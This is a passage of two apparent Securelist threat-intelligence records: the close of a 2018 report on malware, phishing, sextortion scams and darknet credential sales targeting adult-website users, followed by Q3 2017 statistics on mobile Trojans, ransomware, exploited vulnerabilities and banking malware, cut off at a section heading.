The rise in popularity of Trojan-Downloaders can be explained by the fact that such malicious programs are multipurpose: once installed on a victim's device, the threat actor could additionally download virtually any payload they want: from DDoS-bots and malicious ads clickers to password stealers or banking Trojans. As a result, a criminal would need to infect the victim's device only once and would then be able to use it in multiple malicious ways.

2018 has also seen some changes in the share of software that is not-a-virus. All in all, such programs accounted for 15% of all threats in 2017.
In 2018, however, they were on the decline and now account for 11%, with downloaders losing their place in the top-10 most prolific threats. So, while the attackers are using porn less as a decoy, they have yet to inject the malicious files with more harmful threats, such as Trojans and worms.

### Mobile malware

Following technical changes in how we detect and analyze mobile malware, we amended our methodology for this report. Instead of trying to identify the share of porn-themed content in the overall volume of malicious applications that our users encountered, we selected 100,000 random malicious installation packages disguised as porn videos for Android, in 2017 and 2018, and checked them against the database of popular porn tags.

The landscape for types and families of mobile threats is also different than for PC. In both 2017 and 2018, the most common type of threat was AdWare: 70% in 2017 and 89% in 2018.

**Malware name (2017)** | **%** | **Malware name (2018)** | **%**
---|---|---|---
not-a-virus:HEUR:AdWare.AndroidOS.Agent.n | 59.61% | not-a-virus:HEUR:AdWare.AndroidOS.Agent.f | 62.88%
not-a-virus:HEUR:AdWare.AndroidOS.Ewind.h | 11.02% | not-a-virus:HEUR:AdWare.AndroidOS.Agent.n | 17.09%
HEUR:Trojan-Ransom.AndroidOS.Zebt.a | 5.33% | not-a-virus:HEUR:AdWare.AndroidOS.Ewind.h | 9.62%
HEUR:Trojan.AndroidOS.Loapi.b | 3.76% | HEUR:Trojan-Ransom.AndroidOS.Zebt.a | 3.27%
HEUR:Trojan-Ransom.AndroidOS.Small.snt | 2.22% | HEUR:Trojan.AndroidOS.Boogr.gsh | 0.74%
HEUR:Trojan-Dropper.AndroidOS.Agent.hb | 1.93% | HEUR:Trojan-Ransom.AndroidOS.Small.snt | 0.74%
not-a-virus:HEUR:AdWare.AndroidOS.Agent.f | 1.90% | UDS:DangerousObject.Multi.Generic | 0.52%
HEUR:Trojan-Ransom.AndroidOS.Small.as | 1.54% | HEUR:Trojan-Ransom.AndroidOS.Small.as | 0.41%
HEUR:Trojan-Ransom.AndroidOS.Small.cj | 1.29% | not-a-virus:HEUR:AdWare.AndroidOS.Ewind.cx | 0.36%
not-a-virus:HEUR:AdWare.AndroidOS.Ewind.cx | 1.07% | HEUR:Trojan-Ransom.AndroidOS.Small.cj | 0.36%

_Top-10
verdicts that represent porn-related categories, by the number of attacked mobile users, in 2017 and 2018. Source: Kaspersky Security Network_

These threats are typically distributed through affiliate programs focused on earning money as a result of users installing applications and clicking on an advertisement. As well as AdWare, pornography is also used to distribute ransomware (4% in 2018) but on a much smaller scale compared to 2017, when more than 10% of users faced such malicious programs. This decline is most likely a reflection of the overall downward trend for ransomware seen in the malware landscape.

### Credential hunters

A specific type of malware related to pornography, which we have been tracking throughout the year, is implemented by so-called credential hunters. We track them with the help of our botnet-tracking technology, which monitors active botnets and receives intelligence on what kind of activities they perform, in order to prevent emerging threats.

We particularly track botnets that are made up of banking malware. Upon installation on a PC, this malware can monitor which web pages are opened, or create a fake one where the user enters their login and password credentials. Usually such programs are made for stealing money from online banking accounts, but last year we were surprised to discover that there are bots in these botnets that hunt for credentials to pornography websites.

Based on the data we were able to collect, in 2017 there were 27 variations of bots, belonging to three families of banking Trojans, attempting to steal credentials (Betabot, Neverquest and Panda). These Trojans were after credentials to accounts for 10 famous adult content websites (Brazzers, Chaturbate, Pornhub, Myfreecams, Youporn, Wilshing, Motherless, XNXX, X-videos). During 2017, these bots attempted to infect more than 50,000 users over 307,000 times.

In 2018, the number of attacked users doubled, reaching more than 110,000 PCs across the world.
The number of attacks almost tripled, to 850,000 infection attempts. At the same time, the number of variations of malware we were able to spot fell from 27 to 22, but the number of families increased from three to five, meaning that pornography credentials are considered valuable to ever more cybercriminals.

Another important shift that happened in 2018 was that malware families do not hunt for credentials to multiple websites. Instead, they focus on just two: mostly Pornhub and XNXX, whose users were targeted by bots belonging to the Jimmy malware family.

Apparently Pornhub remains popular, not only to regular users of the web, but also to cybercriminals looking for another way of gaining illegal profits by selling user credentials.

## Part 2 - Phishing and spam

Our previous research suggested that it is relatively rare to see pornography as a topic of interest in phishing scams. Instead, criminals prefer to exploit popular sites dedicated to finding sex partners. But in 2018, our anti-phishing technologies started blocking phishing pages that resemble popular pornography websites.

These are generally pages disguised as pornhub.com, youporn.com, xhamster.com, and xvideos.com. In Q4 2017, the overall number of attempts to access phishing pages pretending to be one of the listed websites was **1,608**. Within a year, in Q4 2018, the number of such attempts (**21,902**) was more than ten times higher.

The overall number of attempts to visit phishing webpages pretending to be one of the popular adult-content resources was **38,305**. Leading the list of accessed phishing pages were those that were disguised as a Pornhub page. There were **37,144** attempts to visit the phishing version of the website, while there were only **1,161** attempts to visit youporn.com, xhamster.com, and xvideos.com in total. These figures are still relatively low; other phishing categories may see detection results of millions of attempts per year.
However, the fact that the number of detections on pornography pages is growing may mean that criminals are only just beginning to explore the topic.

It is worth mentioning that phishing pages cannot influence the original page in any way; they merely copy it. The authentic Pornhub page is not connected to the phishing. Moreover, most search engines usually successfully block such phishing pages, so the most likely way to access them is through phishing or spam e-mails, or by being redirected there by malware or a malicious frame on another website.

Fake versions of popular pornography websites target users' credentials and contact details, which can later be either sold or used in other fraud schemes or cyberattacks. In general, credential capture is one of the most popular ways to target users, using pornography to implement phishing fraud schemes. In such schemes, the victim is often lured to a phishing website disguised as a social network, where they are asked to authenticate their identity in order to watch an adult video which can only be accessed if the user confirms they are over 18 years old.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20160843/threats-to-users-of-adult-websites-in-2018-5.png>)

As the victim enters their password, the threat actor captures the credentials to the user's social network account.

Pornographic content phishing can also be used to install malicious software.
For example, to access an alleged adult video, the phishing page requires the user to download and update a video player.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20160919/threats-to-users-of-adult-websites-in-2018-6.png>)

Needless to say, instead of downloading a video player, the user downloads malware.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20160946/threats-to-users-of-adult-websites-in-2018-7.png>)

Sometimes phishing fraudsters target e-wallet credentials with the help of pornographic content. The victim is lured to the pornographic website to watch a video broadcast. In order to view the content, the user is asked to enter their payment credentials.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/21093209/threats-to-users-of-adult-websites-in-2018-8.png>)

### **Spam-scam**

We have rarely seen pornographic content used in any special or specific way when it comes to spam. Apart from the mass distribution of 'standard' advertising offering adult content on legitimate and illegal websites, this type of threat hasn't been spotted using pornography in a creative way. However, there is one exception. Beginning in 2017, an infamous sextortion scam started circulating. Users started to receive messages containing an extortion letter with a demand to transfer bitcoins to fraudsters.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20143648/threats-to-users-of-adult-websites-in-2018-9.png>)

The scammers claimed to have personal messages and recordings of the victim watching porn. The letters even claimed that the threat actor could combine the video that the supposed victim was watching with what was recorded through their webcam.
This extortion is based purely on making threats.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20143709/threats-to-users-of-adult-websites-in-2018-10.png>)

2018, however, saw an increase in the volume of such e-mails. Moreover, they became more sophisticated and were not only threatening the user, but also 'proving' the legitimacy of the scammers' claims by providing the user with actual information about them.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20143739/threats-to-users-of-adult-websites-in-2018-11.png>)

In most cases, it was either a password, or a phone number, or a combination of both with an e-mail address. Since people tend to use the same passwords for different websites, the victim was often likely to believe that paired passwords and e-mail addresses found by the criminal on the dark web were authentic, even if they were not actually correct for the adult-content account in question.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20143805/threats-to-users-of-adult-websites-in-2018-12.png>)

Furthermore, these e-mails have been sent out in more languages than previously found.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20143826/threats-to-users-of-adult-websites-in-2018-13.png>) | [](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20143902/threats-to-users-of-adult-websites-in-2018-14.png>)
---|---

In reality, these mailings were based purely on the assumption that the target of such e-mails would hand over their credentials and that these would become profitable. The number of such scams grew in 2018.

## Part 3 - Darknet insights

One of the burning topics of the adult-content industry is the controversy surrounding paid subscriptions to access websites.
It is often the case that users can register for pornography accounts through a 'premium' subscription model (that includes no advertisements and unlimited access to the adult website content). Otherwise, the website they want to access does not allow them to watch any free content at all unless they pay. At most, the user may see video previews for free but still be expected to make a payment to watch the full video. The opinions around such practice vary. Some people [claim](<https://fightthenewdrug.org/problem-with-paying-for-porn-or-watching-for-free/>) that money paid for porn "directly fuels the industry that supports the abuse, exploitation, and trafficking around the world". [Others argue](<https://www.self.com/story/this-is-why-you-should-pay-for-porn>) that pornography is like most other commodities and people are willing to exchange money for it just as they would other kinds of entertainment, such as TV series or music. Some though prefer to highlight examples of when adult content can result in people being denied their human rights.

Whether it is worth it or not, [some](<https://www.die-screaming.com/porn-memberships-expensive-429291/>) users agree that the price of premium accounts to popular pornography websites is rather high. For example, monthly memberships can vary from $20 to $30, and annual unlimited access costs might scale from $120 to $150. This is where cybercriminals enter the fray.

The research on porn-related cyberthreats we did previously proved that there is a very well developed supply and demand chain for stolen credentials on the dark web. We conducted research on this issue again in 2018, analyzing 20 of the top-rated Tor marketplaces listed on DeepDotWeb, an open Tor site that contains a dynamic ranking of dark markets evaluated by Tor administrators based on customers' feedback. Each of them contained anywhere from one to more than 3,000 offers for credentials to adult content websites.
In total, 29 websites displayed more than 15,000 offers to buy one or more accounts to pornography websites (with, of course, no legal guarantees of delivering on their promise).

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20143918/threats-to-users-of-adult-websites-in-2018-15.jpg>) | [](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/21093226/threats-to-users-of-adult-websites-in-2018-16.jpg>)
---|---

The results of the research conducted in the last year showed that four of the researched markets that offered the widest range of stolen credentials provided users with more than 5,239 unique offers. The figure for 2018 showed that their number doubled, accounting for more than 10,000 offers on sale.

The quantity of accounts available ranged from 1 to 30, with a few exceptions mostly from poorly rated sellers. However, the majority of offers promised to deliver credentials to only one account. Regardless of the type of account, the prices vary from $3 to $9 per offer, very rarely exceeding $10 – the same as back in 2017, with the vast majority of prices being limited to $6-$7 or the equal amount in bitcoins, which is 20 times cheaper than the most modest annual memberships. Getting access to an account illegally for a lower cost than a legal subscription is not the only appeal of buying such credentials on the dark web. There is the added appeal of anonymity, hiding behind other people's credentials while watching pornography.

## Conclusions and advice

Overall, the amount of downloadable malware disguised as pornography detected on users' devices significantly decreased in 2018 in comparison with record activity in 2017. While at first glance this looks like good news, a worrying trend has appeared.
The number of users being attacked with malware that hunts for their pornographic content credentials is on the rise and this means premium subscriptions are now a valuable asset for cybercriminals. There is also the fact that many modern pornography websites include social functionality, allowing people to share their own private content in different ways through the website. Some people make it freely available for all, some decide to limit who can see it. There has also been a significant rise in the number of cases where people suffer from sextortion. In other words, the sphere of adult content may contain cybersecurity challenges other than the 'classic' infected pornography websites and video files armed with malware. These challenges should be addressed properly.

Another cybersecurity risk that adult content brings, which may be less obvious, is the misuse of corporate resources. As mentioned at the beginning of this report, the unsafe consumption of pornography from the workplace may result in the corporate network being hit by a massive infection. While most malicious attacks using pornography are aimed at consumers, not corporations, the fact that most consumers have a job to go to every day brings a certain risk to IT administrators responsible for securing corporate networks.

In order to consume and produce adult content safely, Kaspersky Lab advises the following:

**For consumers:**

 * Before clicking any link, check the link address shown, even in the search results of trusted search engines. If the address was received in an e-mail, check if it is the same as the actual hyperlink.
 * Do not click on questionable websites when they are offered in search results and do not install anything that comes from them.
 * If you wish to buy a paid subscription to an adult content website – purchase it only on the official website.
Double check the URL of the website and make sure it is authentic.
 * Check any email attachments with a security solution before opening them – especially from dark web entities (even if they are expected to come from an anonymous source).
 * Patch the software on your PC as soon as security updates for the latest bugs are available.
 * Do not download pirated software and other illegal content, even if you were redirected to the webpage from a legitimate website.
 * Use a reliable security solution with behavior-based anti-phishing technologies – such as [Kaspersky Total Security](<https://www.kaspersky.com/downloads/thank-you/total-security-free-trial>), to detect and block spam and phishing attacks.
 * Use a robust security solution to protect you from malicious software and its actions – such as [Kaspersky Internet Security for Android](<https://www.kaspersky.com/android-security>).

**For businesses:**

 * Educate employees in basic security hygiene, and explain the policies on accessing websites potentially containing illegal or restricted content, as well as not opening emails or clicking on links from unknown sources.
 * Businesses can also block access to websites that contravene corporate policy, such as porn sites, by using a dedicated endpoint solution such as [Kaspersky Endpoint Security for Business](<https://www.kaspersky.com/small-to-medium-business-security/endpoint-advanced>).
In addition to anti-spam and anti-phishing, it must include application and web controls, and web threat protection that can detect and block access to malicious or phishing web addresses.

_Title: Threats to users of adult websites in 2018. Published: 2019-02-21. Source: https://securelist.com/threats-to-users-of-adult-websites-in-2018/89634/. Record id: SECURELIST:82490B192CB8F0CC0E1B0205E044FDB8. CVEs referenced: CVE-2010-2568, CVE-2017-8464._

_The following record was last seen on 2017-11-10._

## Q3 figures

According to KSN data, Kaspersky Lab solutions detected and repelled **277,646,376** malicious attacks from online resources located in 185 countries all over the world.

**72,012,219** unique URLs were recognized as malicious by web antivirus components.

Attempted infections by malware that aims to steal money via online access to bank accounts were registered on **204,388** user computers.

Crypto ransomware attacks were blocked on **186,283** computers of unique users.

Kaspersky Lab's file antivirus detected a total of **198,228,428** unique malicious and potentially unwanted objects.

Kaspersky Lab mobile security products detected:

 * **1,598,196** malicious installation packages;
 * **19,748** mobile banking Trojans (installation packages);
 * **108,073** mobile ransomware Trojans (installation packages).

## Mobile threats

### Q3 events

#### The spread of the Asacub banker

In the third quarter, we continued to monitor the activity of the mobile banking Trojan Trojan-Banker.AndroidOS.Asacub that actively spread via SMS spam. Q3 saw cybercriminals carry out a major campaign to distribute the Trojan, resulting in a tripling of the number of users attacked.
Asacub activity peaked in July, after which there was a decline in the number of attacks: in September we registered almost three times fewer attacked users than in July.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-1-en.jpg>)

Number of unique users attacked by Trojan-Banker.AndroidOS.Asacub in Q2 and Q3 2017

#### New capabilities of mobile banking Trojans

Q3 2017 saw two significant events in the world of mobile banking Trojans.

Firstly, the family of mobile banking Trojans Svpeng has acquired the [new modification Trojan-Banker.AndroidOS.Svpeng.ae](<https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/>) capable of granting all the necessary rights to itself and stealing data from other applications. To do this, it just needs to persuade the user to allow the Trojan to utilize special functions designed for people with disabilities. As a result, the Trojan can intercept text that a user is entering, steal text messages and even prevent itself from being removed.

Interestingly, in August we discovered yet another modification of Svpeng that uses special features. Only, this time the Trojan was not banking related – instead of stealing data, it encrypts all the files on a device and demands a ransom in bitcoins.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-2.jpg>)

Trojan-Banker.AndroidOS.Svpeng.ag window containing ransom demand

Secondly, the FakeToken family of mobile banking Trojans [has expanded the list of apps it attacks](<https://securelist.com/booking-a-taxi-for-faketoken/81457/>). If previously representatives of this family mostly overlaid banking and some Google apps (e.g. Google Play Store) with a phishing window, it is now also overlaying apps used to book taxis, air tickets and hotels.
The aim of the Trojan is to harvest data from bank cards.

#### The growth of WAP billing subscriptions

In the third quarter of 2017, we continued to monitor the increased activity of Trojans designed to [steal](<https://securelist.com/wap-billing-trojan-clickers-on-rise/81576/>) users' money via subscriptions. To recap, these are Trojans capable of visiting sites that allow users to pay for services by deducting money from their mobile phone accounts. These Trojans can usually click buttons on such sites using special JS files, and thus make payments without the user's knowledge.

Our Top 20 most popular Trojan programs in Q3 2017 included three malware samples that attack WAP subscriptions. They are Trojan-Dropper.AndroidOS.Agent.hb and Trojan.AndroidOS.Loapi.b in fourth and fifth, and Trojan-Clicker.AndroidOS.Ubsod.b in seventh place.

### Mobile threat statistics

In the third quarter of 2017, Kaspersky Lab detected 1,598,196 malicious installation packages, which is 1.2 times more than in the previous quarter.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-3-en.jpg>)

Number of detected malicious installation packages (Q4 2016 – Q3 2017)

#### Distribution of mobile malware by type

[](<https://securelist.com/files/2017/11/q3-2017-statistics-4-en.jpg>)

Distribution of new mobile malware by type (Q2 and Q3 2017)

RiskTool (53.44%) demonstrated the highest growth in Q3 2017, with its share increasing by 12.93 percentage points (p.p.). The majority of all installation packages discovered belonged to the RiskTool.AndroidOS.Skymobi family.

Trojan-Dropper malware (10.97%) came second in terms of growth rate: its contribution increased by 6.29 p.p. Most of the installation packages are detected as Trojan-Dropper.AndroidOS.Agent.hb.

The share of Trojan-Ransom programs, which was first in terms of the growth rate in the first quarter of 2017, continued to fall and accounted for 6.69% in Q3, which is 8.4 p.p.
less than the previous quarter. The percentage of Trojan-SMS malware also fell considerably to 2.62% – almost 4 p.p. less than in Q2.

In Q3, Trojan-Clicker malware broke into this rating after its contribution increased from 0.29% to 1.41% in the space of three months.

#### TOP 20 mobile malware programs

_Please note that this rating of malicious programs does not include potentially dangerous or unwanted programs such as RiskTool or adware._

No. | Verdict | % of attacked users*
---|---|---
1 | DangerousObject.Multi.Generic | 67.14
2 | Trojan.AndroidOS.Boogr.gsh | 7.52
3 | Trojan.AndroidOS.Hiddad.ax | 4.56
4 | Trojan-Dropper.AndroidOS.Agent.hb | 2.96
5 | Trojan.AndroidOS.Loapi.b | 2.91
6 | Trojan-Dropper.AndroidOS.Hqwar.i | 2.59
7 | Trojan-Clicker.AndroidOS.Ubsod.b | 2.20
8 | Backdoor.AndroidOS.Ztorg.c | 2.09
9 | Trojan.AndroidOS.Agent.gp | 2.05
10 | Trojan.AndroidOS.Sivu.c | 1.98
11 | Trojan.AndroidOS.Hiddapp.u | 1.87
12 | Backdoor.AndroidOS.Ztorg.a | 1.68
13 | Trojan.AndroidOS.Agent.ou | 1.63
14 | Trojan.AndroidOS.Triada.dl | 1.57
15 | Trojan-Ransom.AndroidOS.Zebt.a | 1.57
16 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.53
17 | Trojan.AndroidOS.Hiddad.an | 1.48
18 | Trojan.AndroidOS.Hiddad.ci | 1.47
19 | Trojan-Banker.AndroidOS.Asacub.ar | 1.41
20 | Trojan.AndroidOS.Agent.eb | 1.29

_* Percentage of unique users attacked by the malware in question, relative to all users of Kaspersky Lab's mobile security product that were attacked._

First place was occupied by DangerousObject.Multi.Generic (67.14%), the verdict used for malicious programs detected using cloud technologies. This is basically how the very latest malware is detected.

As in the previous quarter, Trojan.AndroidOS.Boogr.gsh (7.52%) came second. This verdict is issued for files recognized as malicious by our system based on machine learning.

Trojan.AndroidOS.Hiddad.an (4.56%) was third.
The main purpose of this Trojan is to open and click advertising links received from the C&C. The Trojan requests administrator rights to prevent its removal.

Trojan-Dropper.AndroidOS.Agent.hb (2.96%) climbed from sixth in Q2 to fourth this quarter. This Trojan decrypts and runs another Trojan – a representative of the Loapi family. One of them – Trojan.AndroidOS.Loapi.b – came fifth in this quarter's Top 20. This is a complex modular Trojan whose main malicious component needs to be downloaded from the cybercriminals' server. We can assume that Trojan.AndroidOS.Loapi.b is designed to steal money via paid subscriptions.

Trojan-Dropper.AndroidOS.Hqwar.i (3.59%), the verdict used for Trojans protected by a certain packer/obfuscator, fell from fourth to sixth. In most cases, this name indicates representatives of the [FakeToken](<https://threats.kaspersky.com/en/threat/Trojan-Banker.AndroidOS.Faketoken>) and [Svpeng](<https://threats.kaspersky.com/en/threat/Trojan-Banker.AndroidOS.Svpeng>) mobile banking families.

In seventh was Trojan-Clicker.AndroidOS.Ubsod.b, a small basic Trojan that receives links from a C&C and opens them. We wrote about this family in more detail in our [review of Trojans](<https://securelist.com/wap-billing-trojan-clickers-on-rise/81576/>) that steal money using WAP subscriptions.

Trojan Backdoor.AndroidOS.Ztorg.c came eighth. This is one of the most active advertising Trojans that uses superuser rights. In the third quarter of 2017, our Top 20 included eight Trojans that try to obtain or use root rights and which make use of advertising as their main means of monetization. Their goal is to deliver ads to the user more aggressively, applying (among other methods) hidden installation of new advertising programs. At the same time, superuser privileges help them 'hide' in the system folder, making it very difficult to remove them.
It's worth noting that the quantity of this type of malware in the Top 20 has been decreasing (in Q1 2017, there were 14 of these Trojans in the rating, while in Q2 the number was 11).

Trojan.AndroidOS.Agent.gp (2.05%), which steals money from users making calls to premium numbers, rose from fifteenth to ninth. Due to its use of administrator rights, it resists attempts to remove it from an infected device.

Occupying fifteenth this quarter was Trojan-Ransom.AndroidOS.Zebt.a, the first ransom Trojan in this Top 20 rating in 2017. This is a fairly simple Trojan whose main goal is to block the device with its window and demand a ransom. Zebt.a tends to attack users in Europe and Mexico.

Trojan.AndroidOS.Hiddad.an (1.48%) fell to sixteenth after occupying second and third in the previous two quarters. This piece of malware imitates various popular games or programs. Interestingly, once run, it downloads and installs the application it imitated. In this case, the Trojan requests administrator rights to withstand removal. The main purpose of Trojan.AndroidOS.Hiddad.an is the aggressive display of adverts. Its main 'audience' is in Russia.

#### The geography of mobile threats

[](<https://securelist.com/files/2017/11/q3-2017-statistics-5-en.jpg>)

The geography of attempted mobile malware infections in Q3 2017 (percentage of all users attacked)

**Top 10 countries attacked by mobile malware (ranked by percentage of users attacked):**

No. | Country* | % of attacked users**
---|---|---
1 | Iran | 35.12
2 | Bangladesh | 28.30
3 | China | 27.38
4 | Côte d'Ivoire | 26.22
5 | Algeria | 24.78
6 | Nigeria | 23.76
7 | Indonesia | 22.29
8 | India | 21.91
9 | Nepal | 20.78
10 | Kenya | 20.43

_* We eliminated countries from this rating where the number of users of Kaspersky Lab's mobile security product is relatively low (under 10,000).
** Percentage of unique users attacked in each country relative to all users of Kaspersky Lab's mobile security product in the country._

For the third quarter in a row Iran was the country with the highest percentage of users attacked by mobile malware – 35.12%. Bangladesh came second, with 28.3% of users there encountering a mobile threat at least once during Q3. China (27.38%) followed in third.

Russia (8.68%) came 35th this quarter (vs 26th place in Q2), France (4.9%) was 59th, the US (3.8%) 67th, Italy (5.3%) 56th, Germany (2.9%) 79th, and the UK (3.4%) 72nd.

The safest countries were Georgia (2.2%), Denmark (1.9%), and Japan (0.8%).

#### Mobile banking Trojans

Over the reporting period we detected 19,748 installation packages for mobile banking Trojans, which is 1.4 times less than in Q2 2017.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-6-en.jpg>)

Number of installation packages for mobile banking Trojans detected by Kaspersky Lab solutions (Q4 2016 – Q3 2017)

Trojan-Banker.AndroidOS.Asacub.ar became the most popular mobile banking Trojan in Q3, replacing the long-term leader Trojan-Banker.AndroidOS.Svpeng.q. These mobile banking Trojans use phishing windows to steal credit card data and logins and passwords for online banking accounts.
In addition, they steal money via SMS services, including mobile banking.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-7-en.jpg>)

Geography of mobile banking threats in Q3 2017 (percentage of all users attacked)

**Top 10 countries attacked by mobile banker Trojans (ranked by percentage of users attacked):**

| | Country* | % of attacked users** |
|---|---|---|
| 1 | Russia | 1.20 |
| 2 | Uzbekistan | 0.40 |
| 3 | Kazakhstan | 0.36 |
| 4 | Tajikistan | 0.35 |
| 5 | Turkey | 0.34 |
| 6 | Moldova | 0.31 |
| 7 | Ukraine | 0.29 |
| 8 | Kyrgyzstan | 0.27 |
| 9 | Belarus | 0.26 |
| 10 | Latvia | 0.23 |

_* We eliminated countries from this rating where the number of users of Kaspersky Lab's mobile security product is relatively low (under 10,000).
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users of Kaspersky Lab's mobile security product in the country._

In Q3 2017, the Top 10 countries attacked by mobile banker Trojans saw little change: Russia (1.2%) topped the ranking again. In second and third places were Uzbekistan (0.4%) and Kazakhstan (0.36%), which came fifth and tenth respectively in the previous quarter. In these countries the Faketoken.z, Tiny.b and Svpeng.y families were the most widespread threats.

Of particular interest is the fact that Australia, a long-term resident at the top end of this rating, didn't make it into our Top 10 this quarter.
This was due to a decrease in activity by the [Trojan-Banker.AndroidOS.Acecard](<https://securelist.com/the-evolution-of-acecard/73777/>) and Trojan-Banker.AndroidOS.Marcher mobile banking families.

#### Mobile ransomware

In Q3 2017, we detected 108,073 mobile Trojan-Ransomware installation packages, almost half the number seen in the previous quarter.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-8-en.jpg>)

Number of mobile Trojan-Ransomware installation packages detected by Kaspersky Lab (Q3 2016 – Q3 2017)

In our report for Q2, [we wrote](<https://securelist.com/it-threat-evolution-q2-2017-statistics/79432/>) that in the first half of 2017 we had discovered more mobile ransomware installation packages than in any other period. The reason was the Trojan-Ransom.AndroidOS.Congur family. However, in the third quarter of this year we observed a decline in this family's activity.

Trojan-Ransom.AndroidOS.Zebt.a became the most popular mobile Trojan-Ransomware in Q3, accounting for more than a third of users attacked by mobile ransomware. Second came Trojan-Ransom.AndroidOS.Svpeng.ab. Meanwhile, [Trojan-Ransom.AndroidOS.Fusob.h](<https://securelist.com/mobile-malware-evolution-2015/73839/>), which topped the rating for several quarters in a row, was only third in Q3 2017.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-9-en.jpg>)

Geography of mobile Trojan-Ransomware in Q3 2017 (percentage of all users attacked)

**Top 10 countries attacked by mobile Trojan-Ransomware (ranked by percentage of users attacked):**

| | Country* | % of attacked users** |
|---|---|---|
| 1 | US | 1.03% |
| 2 | Mexico | 0.91% |
| 3 | Belgium | 0.85% |
| 4 | Kazakhstan | 0.79% |
| 5 | Romania | 0.70% |
| 6 | Italy | 0.50% |
| 7 | China | 0.49% |
| 8 | Poland | 0.49% |
| 9 | Austria | 0.45% |
| 10 | Spain | 0.33% |

_* We eliminated countries from this ranking where the number of users of Kaspersky Lab's mobile security product is lower than 10,000.
** Percentage of unique users in each country attacked by mobile Trojan-Ransomware, relative to all users of Kaspersky Lab's mobile security product in the country._

The US (1.03%) again topped the rating of countries attacked most by mobile Trojan-Ransomware; the most widespread family in the country was Trojan-Ransom.AndroidOS.Svpeng. These Trojans appeared in 2014 as a modification of the Trojan-Banker.AndroidOS.Svpeng mobile banking family. They demand a ransom of about $500 from victims to unblock their devices.

In Mexico (0.91%), which came second in Q3 2017, most mobile ransomware attacks involved Trojan-Ransom.AndroidOS.Zebt.a. Belgium (0.85%) came third, with Zebt.a the main threat to users there too.

## Vulnerable apps exploited by cybercriminals

Q3 2017 saw continued growth in the number of attacks on users involving malicious Microsoft Office documents. We noted the emergence of a large number of combined documents containing both an exploit and a phishing message – in case the embedded exploit fails.

Although two new Microsoft Office vulnerabilities, CVE-2017-8570 and CVE-2017-8759, have emerged, cybercriminals have continued to exploit CVE-2017-0199, a logical vulnerability in the processing of HTA objects that was discovered in March 2017. Kaspersky Lab statistics show that attacks against 65% of users in Q3 exploited CVE-2017-0199, and less than 1% exploited CVE-2017-8570 or CVE-2017-8759. The overall share of exploits for Microsoft Office was 27.8%.

There were no large network attacks (such as [WannaCry](<https://securelist.com/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/78351/>) or [ExPetr](<https://securelist.com/from-blackenergy-to-expetr/78937/>)) launched in Q3 using vulnerabilities patched by the MS17-010 update.
However, according to KSN data, there was major growth throughout the quarter in the number of attempted exploitations of these vulnerabilities that were blocked by our Intrusion Detection System component. Unsurprisingly, the most popular exploits have been EternalBlue and its modifications, which use an SMB protocol vulnerability; however, KL statistics show that EternalRomance, EternalChampion and an exploit for the CVE-2017-7269 vulnerability in IIS web servers have also been actively used by cybercriminals. EternalBlue alone accounts for millions of blocked attempted attacks per month, while the numbers for the other exploits are much lower.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-10-en.jpg>)

Distribution of exploits used in attacks by type of application attacked, Q3 2017

The distribution of exploits by the type of attacked application this quarter was practically the same as in Q2. First place is still occupied by exploits targeting browsers and browser components, with a share of 35.0% (a decline of 4 p.p. compared to Q2). The proportion of exploits targeting Android vulnerabilities (22.7%) was almost identical to that in Q2, placing this type of attacked application once again in third behind Office vulnerabilities.

## Online threats (Web-based attacks)

_These statistics are based on detection verdicts returned by the web antivirus module that protects users at the moment when malicious objects are downloaded from a malicious/infected web page. Malicious sites are specifically created by cybercriminals; infected web resources include those whose content is created by users (e.g. forums), as well as legitimate resources._

### Online threats in the banking sector

_These statistics are based on detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data.
Beginning from the first quarter of 2017 these statistics include malicious programs for ATMs and POS terminals, but do not include mobile threats._

In Q3 2017, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs capable of stealing money via online banking on 204,388 computers.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-11-en.jpg>)

Number of users attacked by financial malware, Q3 2017

#### Geography of attacks

To evaluate and compare the risk of being infected by banking Trojans and ATM and POS malware worldwide, we calculate the percentage of Kaspersky Lab product users in the country who encountered this type of threat during the reporting period, relative to all users of our products in that country.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-12-en.jpg>)

Geography of banking malware attacks in Q3 2017 (percentage of all users attacked)

**TOP 10 countries attacked by banking malware (ranked by percentage of users attacked)**

| | Country* | % of users attacked** |
|---|---|---|
| 1 | Togo | 2.30 |
| 2 | China | 1.91 |
| 3 | Taiwan | 1.65 |
| 4 | Indonesia | 1.58 |
| 5 | South Korea | 1.56 |
| 6 | Germany | 1.53 |
| 7 | United Arab Emirates | 1.52 |
| 8 | Lebanon | 1.48 |
| 9 | Libya | 1.43 |
| 10 | Jordan | 1.33 |

_These statistics are based on detection verdicts returned by the antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.
* We excluded those countries in which the number of Kaspersky Lab product users is relatively small (under 10,000).
** Unique users whose computers have been targeted by banking Trojan malware attacks as a percentage of all unique users of Kaspersky Lab products in the country._

#### TOP 10 banking malware families

